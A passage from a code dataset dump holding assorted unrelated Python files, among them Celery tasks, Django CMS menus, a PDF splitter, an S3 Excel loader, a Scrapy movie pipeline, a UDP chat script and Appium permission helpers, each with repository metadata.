**kwargs):\n logger.info(\"log_scan is running\")\n time.sleep(3)\n\n # do real scan staff...\n\n # call next log-sync service by send msg to Queue 'sync'.\n # from tasks import log_sync\n # log_sync.apply_async(arg=[], queue='sync', routing_key='synced')\n # or\n # call with task name string in case that task modules can not\n # be imported or on the other hosts.\n #app.send_task('tasks.handle_scan', exchange='ScanTask',\n # routing_key='task.log.scan')\n #\n app.send_task('tasks.handle_scan')\n return True\n\n\nif __name__ == \"__main__\":\n app.start()\n","sub_path":"python/celery/scan/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"110095618","text":"\"\"\"Menus for gstudio.plugins\"\"\"\nfrom django.core.urlresolvers import reverse\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom menus.base import Modifier\nfrom menus.base import NavigationNode\nfrom menus.menu_pool import menu_pool\nfrom cms.menu_bases import CMSAttachMenu\n\nfrom gstudio.models import Objecttype\nfrom gstudio.models import Author\nfrom gstudio.models import Metatype\nfrom gstudio.managers import tags_published\nfrom gstudio.plugins.settings import HIDE_OBJECTTYPE_MENU\n\n\nclass ObjecttypeMenu(CMSAttachMenu):\n \"\"\"Menu for the objecttypes organized by archives dates\"\"\"\n name = _('Gstudio Objecttype Menu')\n\n def get_nodes(self, request):\n \"\"\"Return menu's node for objecttypes\"\"\"\n nodes = []\n archives = []\n attributes = {'hidden': HIDE_OBJECTTYPE_MENU}\n for objecttype in Objecttype.published.all():\n year = objecttype.creation_date.strftime('%Y')\n month = objecttype.creation_date.strftime('%m')\n month_text = objecttype.creation_date.strftime('%b')\n day = objecttype.creation_date.strftime('%d')\n\n key_archive_year = 'year-%s' % year\n key_archive_month = 'month-%s-%s' % (year, month)\n key_archive_day = 'day-%s-%s-%s' % (year, month, day)\n\n if not key_archive_year in archives:\n nodes.append(NavigationNode(\n year, reverse('gstudio_objecttype_archive_year', args=[year]),\n key_archive_year, attr=attributes))\n archives.append(key_archive_year)\n\n if not key_archive_month in archives:\n nodes.append(NavigationNode(\n month_text,\n reverse('gstudio_objecttype_archive_month', args=[year, month]),\n key_archive_month, key_archive_year,\n attr=attributes))\n archives.append(key_archive_month)\n\n if not key_archive_day in archives:\n nodes.append(NavigationNode(\n day, reverse('gstudio_objecttype_archive_day',\n args=[year, month, day]),\n key_archive_day, key_archive_month,\n attr=attributes))\n archives.append(key_archive_day)\n\n nodes.append(NavigationNode(objecttype.title, objecttype.get_absolute_url(),\n objecttype.pk, key_archive_day))\n return nodes\n\n\nclass MetatypeMenu(CMSAttachMenu):\n \"\"\"Menu for the metatypes\"\"\"\n name = _('Gstudio Metatype Menu')\n\n def get_nodes(self, request):\n \"\"\"Return menu's node for metatypes\"\"\"\n nodes = []\n nodes.append(NavigationNode(_('Metatypes'),\n reverse('gstudio_metatype_list'),\n 'metatypes'))\n for metatype in Metatype.objects.all():\n nodes.append(NavigationNode(metatype.title,\n metatype.get_absolute_url(),\n metatype.pk, 'metatypes'))\n return nodes\n\n\nclass AuthorMenu(CMSAttachMenu):\n \"\"\"Menu for the authors\"\"\"\n name = _('Gstudio Author Menu')\n\n def get_nodes(self, request):\n \"\"\"Return menu's node for authors\"\"\"\n nodes = []\n nodes.append(NavigationNode(_('Authors'),\n reverse('gstudio_author_list'),\n 'authors'))\n for author in Author.published.all():\n nodes.append(NavigationNode(author.username,\n reverse('gstudio_author_detail',\n args=[author.username]),\n author.pk, 'authors'))\n return nodes\n\n\nclass TagMenu(CMSAttachMenu):\n \"\"\"Menu for the tags\"\"\"\n name = _('Gstudio Tag Menu')\n\n def get_nodes(self, request):\n \"\"\"Return menu's node for tags\"\"\"\n nodes = []\n nodes.append(NavigationNode(_('Tags'), reverse('gstudio_tag_list'),\n 'tags'))\n for tag in tags_published():\n nodes.append(NavigationNode(tag.name,\n reverse('gstudio_tag_detail',\n args=[tag.name]),\n tag.pk, 'tags'))\n return nodes\n\n\nclass ObjecttypeModifier(Modifier):\n \"\"\"Menu Modifier for objecttypes,\n hide the MenuObjecttype in navigation, not in breadcrumbs\"\"\"\n\n def modify(self, request, nodes, namespace, root_id, post_cut, breadcrumb):\n \"\"\"Modify nodes of a menu\"\"\"\n if breadcrumb:\n return nodes\n for node in nodes:\n if node.attr.get('hidden'):\n nodes.remove(node)\n return nodes\n\n\nmenu_pool.register_menu(ObjecttypeMenu)\nmenu_pool.register_menu(MetatypeMenu)\nmenu_pool.register_menu(AuthorMenu)\nmenu_pool.register_menu(TagMenu)\nmenu_pool.register_modifier(ObjecttypeModifier)\n","sub_path":"gstudio/plugins/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":5058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"350650926","text":"#Runtime 55ms, Beats 75.90%\n# Basic idea: Keep searching the max jump range we can get from the element in the current range, and keep track of jumps.\nclass Solution(object):\n def jump(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if nums==[] or len(nums)==1:\n return 0\n i,jump,cur,max_idx=0,1,nums[0],0\n while cur\nx\t#include \nd\t#include <string.h>\nx\t#include \n'''\n\nmain_code_template = '''\\\ndx\t\tchar a[] = \"$a\";\ndx\t\tchar b[] = \"$b\";\ndx\t\tchar s[10];\ndx\t\ndx\t\tstrcpy(s,a+$x0);\ndx\t\tprintf(\"%s\\\\n\",s);\ndx\t\ndx\t\tstrcpy(s+$x1,b);\ndx\t\tprintf(\"%s\\\\n\",s);\n'''\n\nargv_template = ''\n\nstdin_template = ''\n\nstdout_template = '''\\\n$y0\n$y1\n'''\n","sub_path":"cqg/templates/think_c/strings/strcpy_base.py","file_name":"strcpy_base.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"387027237","text":"import boto3\nimport os\nimport io\nimport sys\nimport openpyxl\nimport pandas as pd\nfrom tempfile import NamedTemporaryFile\n\nclass AutomateExcelLoad:\n\tdef __init__(self):\n\t\tself.s3_bucket = os.environ.get('MODEL_BUCKET', 'artifacts')\n\t\tself.s3_model_folder = os.environ.get('MODEL_FOLDER', 'models')\n\t\tself.s3_model_filename = os.environ.get('MODEL_FILENAME', 'filename.xlsx')\n\t\tself.s3_temp_folder = 'temp'\n\t\tself.s3_model_path = f's3://{self.s3_bucket}/{self.s3_model_folder}/{self.s3_model_filename}'\n\t\tself.s3_model_key = f'{self.s3_model_folder}/{self.s3_model_filename}'\n\t\tself.s3_temp_path = f's3://{self.s3_bucket}/temp/{self.s3_model_filename}'\n\t\tself.s3_temp_key = f'temp/{self.s3_model_filename}'\n\t\tself.query_filename = os.environ.get('QUERY_FILENAME', 'query.csv')\n\n\t\tself.region_name = os.environ.get('REGION_NAME', 'us-east-1')\n\t\tself.s3_resource = boto3.resource('s3', region_name=self.region_name)\n\t\tself.s3_client = boto3.client('s3', region_name=self.region_name)\n\n\t\tself.start_row = int(os.environ.get('START_ROW', '2'))\n\t\tself.start_column = int(os.environ.get('START_COLUMN', '1'))\n\t\tself.last_column = int(os.environ.get('LAST_COLUMN', '100'))\n\t\tself.data_name_sheet = os.environ.get('DATA_NAME_SHEET', 'DATA')\n\n\tdef get_df_from_csv(self):\n\t\tresponse = self.s3_resource \\\n\t\t\t\t\t.Bucket(self.s3_bucket) \\\n\t\t\t\t\t.Object(key='query-results/' + self.query_filename) \\\n\t\t\t\t\t.get()\n\t\tresult = pd.read_csv(io.BytesIO(response['Body'].read()), encoding='utf8')\n\t\treturn result\n\n\tdef save_file_on_bucket(self, wb):\n\t\tself.s3_client.put_object(Bucket=self.s3_bucket, Key=self.s3_temp_key)\n\n\t\twith NamedTemporaryFile() as tmp:\n\t\t\ttemp_file = f'tmp/tmp.xlsx'\n\t\t\twb.save(temp_file)\n\t\t\tself.s3_resource.Bucket(self.s3_bucket).upload_file(Filename=temp_file, Key=self.s3_temp_key)\n\n\t\tprint(f'Created temp file {self.s3_model_filename} in {self.s3_temp_path}\\n')\n\n\tdef load_data(self, wb):\n\t\tdf = self.get_df_from_csv()\n\n\t\tsheet_ranges = wb[self.data_name_sheet]\n\t\tlast_index = len(df.index) + 2\n\t\tlast_column = len(df.columns)\n\n\t\t# Limpa todas as células do modelo\n\t\tfor cell in range(self.start_row, 100):\n\t\t\tcolumn_count = 0\n\t\t\twhile column_count <= last_column:\n\t\t\t\tsheet_ranges.cell(row=cell, column=self.start_column+column_count).value = ''\n\t\t\t\tcolumn_count += 1\n\n\t\trow_count = 0\n\n\t\t# Carrega dados\n\t\tfor cell in range(self.start_row, last_index):\n\t\t\tcolumn_count = 0\n\t\t\twhile column_count < last_column:\n\t\t\t\tsheet_ranges.cell(row=cell, column=self.start_column+column_count).value = df.iloc[ row_count , column_count ]\n\t\t\t\tcolumn_count += 1\n\t\t\trow_count += 1\n\n\t\tpivot_sheet = wb['TD']\n\t\tpivot = pivot_sheet._pivots[0]\n\t\tpivot.cache.refreshOnLoad = True\n\n\t\tself.save_file_on_bucket(wb)\n\n\nif __name__ == \"__main__\":\n\tautomate_excel_load = AutomateExcelLoad()\n\n\tmodel_object = automate_excel_load.s3_resource.Bucket(automate_excel_load.s3_bucket).Object(key=automate_excel_load.s3_model_key).get()\n\tmodel_path = io.BytesIO(model_object['Body'].read())\n\tworkbook = openpyxl.load_workbook(model_path)\n\n\tautomate_excel_load.load_data(workbook)\n\tworkbook.close()","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"88168502","text":"def count_character(text, letter):\n result = 0\n for l in text:\n if l.upper() == letter.upper():\n result += 1\n\n return result\n\ndef count_all_characters(text):\n result = {}\n for letter in text:\n if letter.lower() not in result:\n result.update({letter.lower(): count_character(text, letter)})\n return result\n\n\nprint(count_all_characters('Mam dzisiaj dobry humor'))\n\n\"\"\" Zwróci\n{\n 'm': 3,\n 'a': 2,\n ' ': 3,\n 'd': 2,\n 'z': 1,\n 'i': 2,\n 's': 1,\n 'j': 1,\n 'o': 2,\n 'b': 1,\n 'r': 2, ---- Jakiś błąd się wkradł, dwa razy r\n 'y': 1,\n 'h': 1,\n 'u': 1,\n 'r': 1, ----\n}\n\"\"\"\n","sub_path":"exercise7.py","file_name":"exercise7.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"253353391","text":"def splithalfh(inputfilename):\n from PyPDF2 import PdfFileWriter, PdfFileReader, PdfFileMerger\n from tempfile import mkdtemp\n from os.path import join, isfile, splitext\n from os import listdir\n output = PdfFileWriter()\n input1 = PdfFileReader(open(inputfilename+\".pdf\", \"rb\"))\n count = 0\n numpg = input1.getNumPages()\n tempdir = mkdtemp()\n# codice per lo splitting\n# ricavo la pagina\n for i in range(0, numpg):\n pg = input1.getPage(i)\n # Prima Pagina (alto)\n pg.mediaBox.setLowerRight((595, 421))\n outputstream = open(tempdir + \"/\" + str(count)+\".pdf\", \"wb\")\n output.addPage(pg)\n output.write(outputstream)\n pg.mediaBox.setLowerRight((595, 0))\n outputstream.close()\n del output, outputstream\n count += 1\n # Reset Dell'output\n output = PdfFileWriter()\n # Seconda Pagina (Basso)\n pg.mediaBox.setUpperRight((595, 421))\n outputstream = open(tempdir + \"/\" + str(count)+\".pdf\", \"wb\")\n output.addPage(pg)\n output.write(outputstream)\n outputstream.close()\n pg.mediaBox.setUpperRight((595, 842))\n count += 1\n del output, outputstream\n # Reset Dell'output\n output = PdfFileWriter()\n\n# Giunzione delle pagine\n filelist = [splitext(file)[0] for file in listdir(tempdir) if isfile(join(tempdir, file))]\n filelist.sort(key=int)\n\n output = PdfFileMerger()\n for file in filelist:\n input = open(join(tempdir, file + \".pdf\"), \"rb\")\n output.append(input)\n\n os = open(inputfilename+\"_split.pdf\", \"wb\")\n output.write(os)\n os.close()\n","sub_path":"SlideSplitter/splithalfh.py","file_name":"splithalfh.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"612512163","text":"\"Test user API.\"\n\nimport http.client\n\nimport base\n\n\nclass User(base.Base):\n \"Test the user API endpoints.\"\n\n def test_data(self):\n \"Get user JSON.\"\n url = f\"{base.CONFIG['root_url']}/user/{base.CONFIG['username']}\"\n response = self.session.get(url)\n user = self.check_schema(response)\n\n\nif __name__ == '__main__':\n base.run()\n","sub_path":"test/test_user.py","file_name":"test_user.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"97415437","text":"import xml.etree.ElementTree as ET\n\n\ndef indent(elem, level=0):\n i = \"\\n\" + level*\" \"\n if len(elem):\n if not elem.text or not elem.text.strip():\n elem.text = i + \" \"\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n for elem in elem:\n indent(elem, level+1)\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n else:\n if level and (not elem.tail or not elem.tail.strip()):\n elem.tail = i\n\n\nintegrator_type = \"path\"\ninteger_name = \"maxDepth\"\ninteger_value = \"7\"\ntransform_vector = \"\"\nsampler_type = \"\"\nsamples = \"\"\ncamera_type = \"\"\ncamera_name = \"\"\ncamera_value = \"\"\nfilm_type = \"ldrfilm\"\nxres = \"\"\nyres = \"\"\n\nscene = ET.Element(\"scene\",version=\"0.5.0\" )\n\nintegrator = ET.SubElement(scene, \"integrator\", type = integrator_type)\n\nET.SubElement(integrator, \"integer\", name = integer_name, value = integer_value)\n\ntree = ET.ElementTree(scene)\nindent(scene)\ntree.write(\"filename.xml\", encoding=\"utf-8\",xml_declaration=True, method=\"xml\")\n\n\n","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"545306286","text":"import click\n\n@click.command()\n@click.option('--center', nargs=2, type=float,\n help='center of the circle')\n@click.option('--radius', type=float,\n help='radius of the circle')\ndef circle(center, radius):\n click.echo('center: %s, radius: %s' % (center, radius))\n\ncircle()","sub_path":"nargs.py","file_name":"nargs.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"265974157","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport os\nfrom urllib import request\n\nclass DoubanMiviePipeline(object):\n def process_item(self, item, spider):\n \"\"\" test the pipeline functuon\n print(\"in pipelines:\")\n print(item['img'])\n \"\"\"\n if item['name']:\n filepath = 'movies/' + item['name']\n if not os.path.exists(filepath):\n os.makedirs(filepath)\n\n if filepath:\n self.create_readme(item, filepath)\n self.download_image(item['img'], filepath)\n return item\n else:\n raise DropItem(\"write file isn't exists...\")\n\n\n def download_image(self, img_url, filepath):\n url = \"\".join(img_url)\n print(url)\n img_filename = filepath + '/' + url.split('/')[-1]\n with open(img_filename, 'wb') as f:\n f.write(request.urlopen(url).read())\n \n\n def create_readme(self, item, filepath):\n filename = filepath + '/' + 'Readme.txt'\n with open(filename, 'w', encoding = 'utf-8') as f:\n f.write(\"电影名称:%s\\n\" % item['name'])\n f.write(\"评分:%s\\n\" % item['score'])\n f.write(\"导演:%s\\n\" % item['director'])\n f.write(\"编剧: %s\\n\" % item['scriptwriter'])\n f.write(\"主演: %s\\n\" % item['lead_actor'])\n f.write(\"类型: %s\\n\" % item['type'])\n f.write(\"官方网站: %s\" % item['offcialSite'])\n f.write(\"制片国家/地区: %s\\n\" % item['productAddress'])\n f.write(\"语言: %s\\n\" % item['language'])\n f.write(\"上映日期: %s\\n\" % item['initialReleaseDate'])\n f.write(\"片长: %s\\n\" % item['runtime'])\n f.write(\"别名: %s\\n\" % item['aliasName'])\n f.write(\"IMDb链接: %s\\n\" % item['IMDBAddress'])\n f.write(\"简介: %s\\n\" % item['brief_info'])","sub_path":"myscrapy/test/douban_mivie/douban_mivie/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"581183481","text":"import requests\nfrom bs4 import BeautifulSoup\n\nurl = \"https://comic.naver.com/webtoon/weekdayList.nhn?week=tue\"\n\nreq = requests.get(url)\n\nprint(req)\t\t # get은 단순히 응답코드만 가져옵니다.\n\nhtml = req.text\t # html내용을 가져오기 위해 text를 가져옵니다. 인코딩이 안 맞을 경우에는 인코딩 방식을 바꾸거나 .content를 쓸 수 있습니다.\n\n# print(html)\n\nsoup = BeautifulSoup(html, 'html.parser')\nresult = soup.select('.thumb')\n\nprint(result)","sub_path":"pythonEx/day2/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"444150111","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pylab as plt\nfrom sklearn.linear_model import LogisticRegression\n\ndatos=pd.read_csv(\"Default.csv\")\n'''\n#print(datos[\"default\"]==\"Yes\")\na =np.array(datos[\"default\"]==\"Yes\")\nBalance_y,Income_y= np.array(datos[\"balance\"]),np.array(datos[\"income\"])\nBalance_y,Income_y=Balance_y[a],Income_y[a]\na =np.array(datos[\"default\"]==\"No\")\nBalance_n,Income_n= np.array(datos[\"balance\"]),np.array(datos[\"income\"])\nBalance_n,Income_n=Balance_n[a],Income_n[a]\n# plt.plot(Balance_n,Income_n,marker=\"x\",color=\"orangered\")\n# plt.plot(Balance_y,Income_y,marker=\"+\",color=\"navy\")\nplt.plot(Balance_y,Income_y,\"xb\")\nplt.plot(Balance_n,Income_n,\"+r\")\nplt.show()\ndatos.boxplot(column='balance', by=\"default\")\nplt.show()\ndatos.boxplot(column='income', by=\"default\")\nplt.show()\n'''\nX, Y =np.array( datos[\"balance\"].values.reshape(-1,1)),np.array(datos[\"default\"])\nclf = LogisticRegression(random_state=0, solver='lbfgs').fit(X,Y)\nprob=clf.predict_proba(X)\ncoef=clf.coef_\ninter=clf.intercept_\nprint(coef,inter)\n# ---------------------- Usar esto ------------------\na= np.array(datos[\"student\"]==\"Yes\")\nStudent_y=np.ones(len(datos[\"student\"]))\nStudent_y[~a]=0\nStudent_y = Student_y.reshape(-1,1)\nclf_2 = LogisticRegression(random_state=0, solver='lbfgs').fit(Student_y,Y)\nprob=clf_2.predict(Student_y)\ncoef=clf_2.coef_\ninter=clf_2.intercept_\nprint(coef,inter)\n# -------------------------------------------\n'''\na= np.array(datos[\"student\"]==\"Yes\")\nStudent_y=np.ones(len(datos[\"student\"]))\nStudent_y=Student_y[a]\ng = datos[\"default\"].values[a]\n# Student = np.ones(len(datos[\"student\"]))\n# Student[~a]=0\nStudent_y = Student_y.reshape(-1,1)\nclf_2 = LogisticRegression(random_state=0, solver='lbfgs').fit(Student_y,g)\ncoef=clf_2.coef_\ninter=clf_2.intercept_\nprint(coef,inter)\n'''\n\n'''\nplt.scatter(datos[\"balance\"],prob[:,1])\nplt.show()\n# plt.scatter(datos[\"balance\"].values,prob[:,0])\n# plt.show()\n'''\n# a= np.array(datos[\"student\"]==\"Yes\")\n# Student_y=np.ones(len(datos[\"student\"]))\n# Student_y[~a]=0\n# Student_y = Student_y.reshape(-1,1)\nX= np.array(datos[[\"balance\",\"income\"]])\nX = np.append(X,Student_y,axis=1)\nclf_3 = LogisticRegression(random_state=0, solver='lbfgs',multi_class='multinomial').fit(X,Y)\nprob=clf_3.predict(X)\ncoef=clf_3.coef_\ninter=clf_3.intercept_\nprint(coef,inter)\n","sub_path":"Otros Codigos/Default_model.py","file_name":"Default_model.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"233043316","text":"from openpyxl import load_workbook\nfrom concepts import Context\nimport os\nimport csv\nimport re\n\n\ndef build_lattice(filename):\n filecsv = 'dataset.csv'\n attributes, cells = load_attributes_object(filename)\n create_csv_file(filecsv, attributes, cells)\n create_lattice_file(filecsv, filename)\n\n print('Lattice builted.')\n\n\ndef load_attributes_object(filename):\n workbook = load_workbook(filename)\n worksheet = workbook['Foglio1']\n\n dimension = worksheet.calculate_dimension()\n final_object_cell = re.split(':', dimension)[1]\n final_attribute_cell = re.findall('[A-Z]+', final_object_cell)[0] + '1'\n\n attributes = worksheet['A1':final_attribute_cell]\n cells = worksheet['A2':final_object_cell]\n\n return attributes, cells\n\n\ndef create_csv_file(filecsv, attributes, cells):\n row_list, l = [], []\n\n for attr in attributes[0]:\n l.append(attr.value)\n\n row_list.append(l)\n\n for row in cells:\n l = []\n l.append(row[0].value)\n for i in range(1, len(row)):\n l.append('X') if str(row[i].value) == '1' else l.append('')\n row_list.append(l)\n\n with open(filecsv, 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerows(row_list)\n\n\ndef create_lattice_file(filecsv, filename):\n lat = Context.fromfile(filecsv, frmat='csv').lattice\n os.remove(filecsv)\n\n path = '/data/lattices'\n filename = path + filename.replace('.xlsx', '.txt')\n\n with open(filename, 'w') as fp:\n fp.write(str(lat))\n\n # View lattice liake a graph\n # c.graphviz(filename=\"exampleLattice\",view=True)\n # print('Lattice graph created')\n","sub_path":"Formal Concept Analysis (FCA)/FCA Demo/lattice.py","file_name":"lattice.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"432271017","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*\n'''\ncreated by will \n'''\n\nfrom metamap.models import TblBlood\n\ndef clean_blood(blood, current=0):\n '''\n 为了方便mermaid显示,把blood里的@替换为__\n :param blood:\n :return:\n '''\n blood.parentTbl = blood.parentTbl.replace('@', '__')\n blood.tblName = blood.tblName.replace('@', '__')\n if current > 0:\n blood.tblName += ';style ' + blood.tblName.replace('@', '__') + ' fill:#f9f,stroke:#333,stroke-width:4px'\n return blood\n\ndef find_parent_mermaid(blood, final_bloods, current=0):\n '''\n # 循环遍历当前节点的父节点\n :param blood:\n :param final_bloods:\n :return:\n '''\n bloods = TblBlood.objects.filter(tblName=blood.parentTbl)\n if bloods.count() > 0:\n for bld in bloods:\n final_bloods.add(clean_blood(bld, current))\n find_parent_mermaid(bld, final_bloods)\n\n\ndef find_child_mermaid(blood, final_bloods, current=0):\n '''\n 循环遍历当前节点的子节点\n :param blood:\n :param final_bloods:\n :return:\n '''\n bloods = TblBlood.objects.filter(parentTbl=blood.tblName)\n if bloods.count() > 0:\n for bld in bloods:\n final_bloods.add(clean_blood(bld, current))\n find_parent_mermaid(bld, final_bloods)\n","sub_path":"metamap_django/metamap/helpers/bloodhelper.py","file_name":"bloodhelper.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"344800179","text":"# -*- coding: utf-8 -*-\r\n# Copyright (c) 2015-2016, Exa Analytics Development Team\r\n# Distributed under the terms of the Apache License 2.0\r\n\"\"\"\r\nRepeat\r\n############################\r\nFunctions for repeating arrays of varying dimensions.\r\n\"\"\"\r\nimport numpy as np\r\nfrom exa._config import config\r\n\r\n\r\ndef repeat_count(array, n):\r\n \"\"\"\r\n Repeat each element of an array n times.\r\n \"\"\"\r\n pass\r\n\r\n\r\ndef repeat_counts_f8_1d(array, counts):\r\n \"\"\"\r\n Repeat each element of an array n times (with variable n).\r\n \"\"\"\r\n m = len(array)\r\n nn = np.sum(counts)\r\n repeated = np.empty((nn, ), dtype=np.float64)\r\n h = 0\r\n for i in range(m):\r\n count = counts[i]\r\n record = array[i]\r\n for j in range(count):\r\n repeated[h] = record\r\n h += 1\r\n return repeated\r\n\r\n\r\ndef repeat_counts_f8_2d(array, counts):\r\n \"\"\"\r\n Repeat each element of an array n times (with variable n).\r\n \"\"\"\r\n m, n = array.shape\r\n nn = np.sum(counts)\r\n repeated = np.empty((nn, n), dtype=np.float64)\r\n h = 0\r\n for i in range(m):\r\n count = counts[i]\r\n record = array[i]\r\n for j in range(count):\r\n repeated[h] = record\r\n h += 1\r\n return repeated\r\n\r\n\r\nif config['dynamic']['numba'] == 'true':\r\n from numba import jit\r\n repeat_counts_f8_1d = jit(nopython=True, cache=True, nogil=True)(repeat_counts_f8_1d)\r\n repeat_counts_f8_2d = jit(nopython=True, cache=True, nogil=True)(repeat_counts_f8_2d)\r\n","sub_path":"exa/math/misc/repeat.py","file_name":"repeat.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"212437373","text":"import socket \nimport os\nfrom threading import *\n\nos.system(\"tput setaf 7\")\ndef sender(server_ip,server_port):\n s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n name = input(\"\\n\\t\\ttype your name : \")\n print(f\"\\t\\tWelcome to chat room {name} (to quit type : q)\")\n while True :\n data = input(\"\\t\\tmsg : \") \n data = f\"{name} : \" + data\n #print(\"\\t\\t\",data)\n s.sendto(data.encode(),(server_ip,server_port))\n\ndef reciever(ip,port):\n s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n s.bind((ip,port))\n while True:\n data = s.recvfrom(1024)\n print(\"\\t\\t\",data[0].decode())\n \nserver_ip = \"192.168.99.1\"\nserver_port = 2222\n\nip = \"192.168.56.101\"\nport = 2222\n\nThread(target=sender,args=(server_ip,server_port)).start()\nThread(target=reciever,args=(ip,port)).start()\n\n","sub_path":"linchat.py","file_name":"linchat.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"646731808","text":"\n\n\n\n\n\nclass Permissions():\n permission_allow_button_id=None #Global variable\n permission_deny_button_id = None\n\n def __init__(self,driver): #constructor\n self.driver=driver #variables for locators\n self.permission_allow_button_id=\"com.android.packageinstaller:id/permission_allow_button\" #Local variable\n self.permission_deny_button_id=\"com.android.packageinstaller:id/permission_deny_button\"\n\n def launch_deny_permission(self):\n self.driver.reset()\n self.driver.find_element_by_id(self.permission_allow_button_id).click()\n self.driver.find_element_by_id(self.permission_deny_button_id).click()\n self.driver.launch_app()\n\n def deny_permission(self):\n self.driver.reset()\n self.driver.find_element_by_id(self.permission_deny_button_id).click()\n self.driver.find_element_by_id(self.permission_allow_button_id).click()\n self.driver.launch_app()\n\n def launch_permission(self): #actions/functions for locators\n self.driver.reset()\n self.driver.find_element_by_id(self.permission_allow_button_id).click() # Replace element locators with variable\n self.driver.find_element_by_id(self.permission_allow_button_id).click()\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"k12learningapp/automationproject/Pages/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"210812887","text":"import csv\nz = {3.0,4,5}\na = [str(int(item)) for item in z]\nprint(a[0])\nprint(a[1])\nprint(a)\n\nwriter = csv.writer(open('pr1.csv','w'),delimiter = ',',quoting=csv.QUOTE_NONNUMERIC, lineterminator='\\n')\nfor i in range(0,1):\n writer.writerow(['ImageId','Label'])\nfor i in range(1,9):\n writer.writerow([a[1],\"Tek\"])\n\n\n","sub_path":"2015-2016/SVM/writetosvc.py","file_name":"writetosvc.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"97683073","text":"class Solution:\n def findMin(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n low, high = 0, len(nums) - 1\n while low <= high:\n mid = (low + high) // 2\n if nums[low] <= nums[mid]:\n if nums[mid] <= nums[high]:\n high -= 1\n else:\n low = mid + 1\n else:\n if nums[mid] <= nums[high]:\n high = mid\n\n return nums[low]\n\nif __name__ == \"__main__\":\n nums = [1,3,5]\n print(Solution().findMin(nums))","sub_path":"src/0154-Find-Minimum-in-Rotated-Sorted-Array-II/0154.py","file_name":"0154.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"253476671","text":"from lifetimeServer import handlerHelper\nfrom trelloNotifier import TrelloNotifier\nimport os, sys, logging, coloredlogs\nfrom logging.handlers import RotatingFileHandler\nfrom datetime import datetime\n\n\nclass FarmWatcher:\n\n _TrelloNotifier = None\n trello_admins = []\n post_issue_after = None\n\n _farms = []\n _last_alive_time = []\n _farms_ip = []\n\n config_path = \"\"\n local_path = os.path.dirname(os.path.abspath(sys.argv[0]))\n\n def __init__(self, config_path):\n try:\n coloredlogs.install(level='DEBUG')\n logging.getLogger('').addHandler(RotatingFileHandler(\n os.path.dirname(os.path.abspath(sys.argv[0])) + '/farmWatcher.log', maxBytes=(1048576*5), backupCount=7))\n\n self.config_path = config_path\n\n logging.info(\"Connecting to Trello...\")\n self._TrelloNotifier = \\\n TrelloNotifier(key=self._get_var(\"TRELLO_API_KEY\", is_required=True),\n token=self._get_var(\"TRELLO_API_TOKEN\", is_required=True))\n self.trello_admins = self._get_var(\"TRELLO_ADMINS\", is_required=True).split(',')\n self.post_issue_after = self._get_var(\"POST_ISSUE_AFTER\", is_required=True)\n\n handlerHelper.set_watcher(self)\n handlerHelper.start_server(self._get_var(\"SERVER_IP\", is_required=True),\n 